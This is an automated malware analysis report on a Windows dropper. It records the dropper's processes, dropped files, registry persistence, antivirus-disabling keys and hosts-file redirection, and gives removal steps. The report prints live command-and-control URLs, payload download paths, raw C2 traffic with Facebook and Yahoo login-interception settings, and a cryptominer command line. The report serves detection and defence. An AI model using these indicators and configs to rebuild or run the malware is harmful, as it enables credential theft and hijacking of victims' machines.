Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour:
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0306430436df74471b0a3f2309632415
SHA1: 6bf118b40bc8419d9f94b38142e60e4c4b9e25b5
SHA256: b1741d35878ccb5469ffc30ee659a3ef716ff18b63f824f85dfc8f61778cfdba
SSDeep: 24576:wW79BHGwwIYpXGGHXFRGTTD2jCs16J oVa/d3n3bnSVEYpL:5S9 TvAF/tn/Yh
Size: 838144 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-07 10:49:58
Analyzed on: WindowsXP SP3 32-bit
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
%original file name%.exe:1968
zcwj1w7efz3kqsxdn.exe:2252
zcwj1w7efe89qsxdn.exe:240
zcwj1w7efm80qsxdn.exe:880
alccsjb.exe:3776
zcwj1w7efav5qsxdnln67pfy.exe:2384
pozlrpaqbu.exe:1560
pozlrpaqbu.exe:3076
The Malware injects its code into the following process(es):
No processes have been created.
File activity
The process %original file name%.exe:1968 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (3911 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (0 bytes)
The process zcwj1w7efm80qsxdn.exe:880 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
The process alccsjb.exe:3776 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
The process zcwj1w7efav5qsxdnln67pfy.exe:2384 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\etc (10 bytes)
%System%\mjbaidfvllkvssl\tst (10 bytes)
%System%\pozlrpaqbu.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process pozlrpaqbu.exe:1560 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
The process pozlrpaqbu.exe:3076 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\cfg (821 bytes)
%System%\mjbaidfvllkvssl\tst (10 bytes)
%System%\mjbaidfvllkvssl\run (10 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (1940 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\mjbaidfvllkvssl\ihst (226 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\alccsjb.exe (5873 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (5873 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\mjbaidfvllkvssl\por (1 bytes)
%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (35 bytes)
%System%\mjbaidfvllkvssl\rng (192 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (35 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (0 bytes)
Registry activity
The process zcwj1w7efz3kqsxdn.exe:2252 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 39 A6 8D ED 2E 3D A3 AC A4 F8 8E 20 6F 88 01"
The process zcwj1w7efe89qsxdn.exe:240 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 FF 6B 77 C8 5C A8 49 EF 29 CF 94 0E 53 1D C3"
The process zcwj1w7efm80qsxdn.exe:880 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 67 37 7B 60 71 56 DE F5 B2 0F 87 A9 D9 0D 20"
The process zcwj1w7efav5qsxdnln67pfy.exe:2384 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 84 24 D1 A4 E8 42 E7 BB 7E AF AE 6C D6 F3 A9"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COM Sharing Registrar CardSpace Detection" = "%System%\pozlrpaqbu.exe"
The process pozlrpaqbu.exe:3076 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C8 FF 50 02 C0 95 ED 1F 8D 42 65 60 99 C9 79"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The Malware deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
Dropped PE files
MD5 | File path |
---|---|
14ff2121eda9993823b5b7e32a6475c9 | c:\WINDOWS\system32\win32drkclient.exe |
ee117a41ec7d1a8a78ec55ae1d66909a | c:\WINDOWS\system32\win64drkaesent.exe |
897914962939e2406d9a25261cf7b604 | c:\WINDOWS\system32\win64drkclient.exe |
HOSTS file anomalies
The Malware modifies the "%System%\drivers\etc\hosts" file, which is used to translate DNS entries to IP addresses. The modified file is 804 bytes in size. The following entries are added to the hosts file:
127.0.0.1 | www.facebook.com |
127.0.0.1 | facebook.com |
127.0.0.1 | mail.yahoo.com |
127.0.0.1 | my.ebay.com |
127.0.0.1 | cgi.ebay.com |
127.0.0.1 | offer.ebay.com |
127.0.0.1 | feedback.ebay.com |
127.0.0.1 | motors.search.ebay.com |
127.0.0.1 | search.ebay.com |
127.0.0.1 | pages.ebay.com |
127.0.0.1 | pages.motors.ebay.com |
127.0.0.1 | myworld.ebay.com |
127.0.0.1 | motors.listings.ebay.com |
127.0.0.1 | cgi1.ebay.com |
127.0.0.1 | contact.ebay.com |
127.0.0.1 | srx.ebaymotors.ebayrtm.com |
127.0.0.1 | motors.shop.ebay.com |
127.0.0.1 | forums.ebay.com |
127.0.0.1 | answercenter.ebay.com |
127.0.0.1 | shop.ebay.com |
127.0.0.1 | ocs.ebay.com |
127.0.0.1 | cschatlb-na.corp.ebay.com |
127.0.0.1 | cschat1-na.corp.ebay.com |
127.0.0.1 | cschat.ebay.com |
127.0.0.1 | helpdesk.corp.ebay.com |
127.0.0.1 | qu.corp.ebay.com |
127.0.0.1 | www.ebay.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1968
zcwj1w7efz3kqsxdn.exe:2252
zcwj1w7efe89qsxdn.exe:240
zcwj1w7efm80qsxdn.exe:880
alccsjb.exe:3776
zcwj1w7efav5qsxdnln67pfy.exe:2384
pozlrpaqbu.exe:1560
pozlrpaqbu.exe:3076
- Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%System%\mjbaidfvllkvssl\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (3911 bytes)
%System%\mjbaidfvllkvssl\etc (10 bytes)
%System%\pozlrpaqbu.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\mjbaidfvllkvssl\cfg (821 bytes)
%System%\mjbaidfvllkvssl\run (10 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (1940 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\mjbaidfvllkvssl\ihst (226 bytes)
%System%\alccsjb.exe (5873 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (5873 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\mjbaidfvllkvssl\por (1 bytes)
%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (35 bytes)
%System%\mjbaidfvllkvssl\rng (192 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (35 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COM Sharing Registrar CardSpace Detection" = "%System%\pozlrpaqbu.exe"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 658438 | 658944 | 4.70058 | 5a956f6ef3d48190316db8984480cd3b |
.rdata | 663552 | 52386 | 52736 | 3.66732 | 75fd3137681c7e920256f904aeffb460 |
.data | 716800 | 159324 | 125440 | 5.50184 | 3b3c70bbd40ea495fc354b3ae364ff3f |
Network Activity
URLs
URL | IP |
---|---|
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=027&sox=3c0f8605 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=all&flag&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/dep/win64drkclient.exe | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=checkport&port=23338&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/dep/win32drkclient.exe | 98.139.135.198 |
hxxp://tablefruit.net/dep/win64drkaesent.exe | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=setvar&key=stopped&value=3b93be04&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/pingtest | 98.139.135.198 |
hxxp://partyorderly.net/dep/win32drkclient.exe | 98.139.135.198 |
hxxp://partyorderly.net/dep/win64drkclient.exe | 98.139.135.198 |
hxxp://partyorderly.net/dep/win64drkaesent.exe | 98.139.135.198 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:22 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
ping.5.FLAG cfg.293."jinoplasker.com" "limosebast.com" "uponloud.net" "glasshealth.net" "stickmarch.net" "frontride.net" "necessarydress.net" "wrongthrew.net" "spendmarry.net" "requireneither.net" "gentlefriend.net" "littleappear.net" "rememberpaint.net" "tablefruit.net" "mightglossary.net" "throughcountry.net" var_user_ip.563.%invite_cc% = "1";.%ban_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=7cb9d43961b9887cd63eed7c5ac5f694&talk=1";.%ebaylive% = "partyorderly.net";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.%dep_host% = "partyorderly.net";.%dep_path% = "/dep/";.%no_password% = "0";.%timer% = "480";.%state% = "CA";.%cpuinfo% = "Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)";..............
GET /forum/search.php?method=setvar&key=stopped&value=3b93be04&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:17 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 6
Server: YTS/1.20.28
.............
GET /forum/pingtest HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:55 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 14 May 2012 04:16:44 GMT
Accept-Ranges: bytes
Content-Length: 101376
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
data=c3Bhd25lZDogJ3dpbjMyZHJrY2xpZW50LmV4ZSAtYSBYMTEgLW8gc3RyYXR1bSt0Y3A6Ly8xMDguMTc0LjE0Ni43ODozMzg4IC11IDNjMGY4NjA1IC1wIHgnDQo=
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:19 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:55 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............
GET /dep/win64drkaesent.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:09 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 24 Feb 2014 22:08:01 GMT
Accept-Ranges: bytes
Content-Length: 2777088
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
GET /dep/win32drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sun, 23 Feb 2014 00:22:10 GMT
Accept-Ranges: bytes
Content-Length: 962048
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
GET /forum/search.php?method=checkport&port=23338&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:02 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 32
Server: YTS/1.20.28
GET /forum/search.php?method=validate&mode=sox&v=027&sox=3c0f8605 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:53 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
GET /forum/search.php?method=all&flag&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:54 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
ping.5.FLAG cfg.293."jinoplasker.com" "limosebast.com" "requireneither.net" "frontride.net" "rememberpaint.net" "uponloud.net" "gentlefriend.net" "glasshealth.net" "littleappear.net" "stickmarch.net" "throughcountry.net" "wrongthrew.net" "tablefruit.net" "necessarydress.net" "spendmarry.net" "mightglossary.net" var_user_ip.650.%kill_jhminer% = "1";.%invite_cc% = "1";.%ban_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=7cb9d43961b9887cd63eed7c5ac5f694&talk=1";.%ebaylive% = "partyorderly.net";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.%dep_host% = "partyorderly.net";.%dep_path% = "/dep/";.%no_password% = "0";.%timer% = "480";.%state% = "CA";.%cpuinfo% = "QEMU Virtual CPU version 0.12.5 (2499 MHz)";.%ip% = "86.35.223.12";.%relay_soxid% = "3b93be04";.%port% = "22271";.plugin.55070.miner_forced.80.win32drkclient.exe -a X11 -o stratum tcp://108.174.146.78:3388 -u 3c0f8605 -p x.
<<< skipped >>>
GET /forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:29 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............
GET /dep/win64drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:56 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 21 Feb 2014 20:25:42 GMT
Accept-Ranges: bytes
Content-Length: 2785792
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:56 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
..........................
Strings from Dumps
%s</pre><pre>hex2bin failed on '%s'</pre><pre>DEBUG: %s</pre><pre>Hash: %s</pre><pre>Target: %s</pre><pre>http%s</pre><pre>http_proxy</pre><pre>Stratum connection failed: %s</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}</pre><pre>mining.notify</pre><pre>Stratum session id: %s</pre><pre>mining.set_difficulty</pre><pre>client.reconnect</pre><pre>stratum tcp://%s:%d</pre><pre>Server requested reconnection to %s</pre><pre>client.get_version</pre><pre>cpuminer/2.3.2</pre><pre>client.show_message</pre><pre>MESSAGE FROM SERVER: %s</pre><pre>{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}</pre><pre>#"! '&%$ *)(/.-,32107654;:98?>=<2</pre><pre>tXXFr.rh.44Aw-wl-66</pre><pre>r.rh.44Fw-wl-66A</pre><pre>.rh.44Fr-wl-66Aw</pre><pre>O9K\9..eKW</pre><pre>trh.44Fr.wl-66Aw-</pre><pre>K\9..eK9</pre><pre>h.44Fr.rl-66Aw-w</pre><pre>O\9..eK9K=W</pre><pre>.44Fr.rh-66Aw-wl</pre><pre>9..eK9K\W</pre><pre>t44Fr.rh.66Aw-wl-</pre><pre>..eK9K\9</pre><pre>tX4Fr.rh.46Aw-wl-6</pre><pre>.eK9K\9.</pre><pre>7.35.0</pre><pre>smtp</pre><pre>tftp</pre><pre>getpeername() failed with errno %d: %s</pre><pre>getsockname() failed with errno %d: %s</pre><pre>ssrem inet_ntop() failed with errno %d: %s</pre><pre>ssloc inet_ntop() failed with errno %d: %s</pre><pre>sa_addr inet_ntop() failed with errno %d: %s</pre><pre>Trying %s...</pre><pre>Could not set TCP_NODELAY: %s</pre><pre>TCP_NODELAY set</pre><pre>Failed to set SO_KEEPALIVE on fd %d</pre><pre>Failed to set SIO_KEEPALIVE_VALS on fd %d: %d</pre><pre>Couldn't bind to interface '%s'</pre><pre>Local Interface %s is ip %s using address family %i</pre><pre>Name '%s' family %i resolved to '%s' family %i</pre><pre>Local port: %hu</pre><pre>Bind to local port %hu failed, trying next</pre><pre>bind failed with errno %d: %s</pre><pre>Immediate connect fail for %s: %s</pre><pre>Couldn't bind to '%s'</pre><pre>connect to %s port %ld 
failed: %s</pre><pre>Failed to connect to %s port %ld: %s</pre><pre>[%s %s %s]</pre><pre>Send failure: %s</pre><pre>Recv failure: %s</pre><pre>Write callback asked for PAUSE when not supported!</pre><pre>%s:%d</pre><pre>Hostname was %sfound in DNS cache</pre><pre>timeout on name lookup is not supported</pre><pre>%5[^:]:%d:%5s</pre><pre>Resolve %s found illegal!</pre><pre>Added %s:%d:%s to DNS cache</pre><pre>IDN support not present, can't parse Unicode domains</pre><pre>CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!</pre><pre>Connected to %s (%s) port %ld (#%ld)</pre><pre>User-Agent: %s</pre><pre>[^:]:%[^</pre><pre>:]://%[^</pre><pre><url> malformed</url></pre><pre>SMTP.</pre><pre>Rebuilt URL to: %s</pre><pre>Protocol %s not supported or disabled in libcurl</pre><pre>%s://%s</pre><pre>[%*45[0123456789abcdefABCDEF:.]%c</pre><pre>;type=%c</pre><pre>%s://%s%s%s:%hu%s%s%s</pre><pre>Port number too large: %lu</pre><pre>Couldn't find host %s in the _netrc file; using defaults</pre><pre>ftp@example.com</pre><pre>Found bundle for host %s: %p</pre><pre>Server doesn't support pipelining</pre><pre>Found connection %ld, with requests in the pipe (%zu)</pre><pre>Re-using existing connection! 
